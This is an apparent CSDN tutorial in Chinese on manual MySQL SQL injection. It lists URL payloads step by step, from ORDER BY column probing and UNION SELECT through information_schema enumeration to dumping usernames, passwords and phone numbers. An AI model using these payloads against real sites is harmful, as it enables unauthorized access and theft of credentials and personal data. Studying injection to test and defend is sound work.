mysql post手工注入_MySQL手工注入

本文详细介绍了MySQL手工注入的基础知识,包括ORDER BY探测、联合查询、爆破库名、表名和列名,以及如何读取数据。通过示例URL展示了不同类型的注入攻击手法,帮助理解SQL注入漏洞的利用过程。
摘要由CSDN通过智能技术生成

一些手工注入基础

(以数字型为例,字符型需要单引号'闭合)

1、oder by

http://url?id=1+order+by+{num}

num=n 正常

num=n+1 错误

2、联合查询

http://url?id=1+union+select+1,2,3,......,n+--

页面出现显示位:

4e931a93f9c3

显示位

3、爆破库名

http://url?id=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,group_concat(schema_name)+from+information_schema.schemata+--

一般是放在显示位最后一位,如上所示;若放在其他显示位payload如下:

http://url?id=1+union+select+1,group_concat(schema_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.schemata+--

4e931a93f9c3

数据库查询

4、爆破表名

http://url?id=1+union+select+1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.tables+where+table_schema=0x776562706870{库名的16进制}+--

4e931a93f9c3

表名查询

5、爆破列名

http://url?id=1+union+select+1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.columns+where+table_name=0x6563735f7573657273{表名的16进制}+--

4e931a93f9c3

列名查询

6、读取数据

http://url?id=1+union+select+1,group_concat(user_name,0x7e,password,0x7e,mobile_phone),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+{table_name}+--

4e931a93f9c3

读数据

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值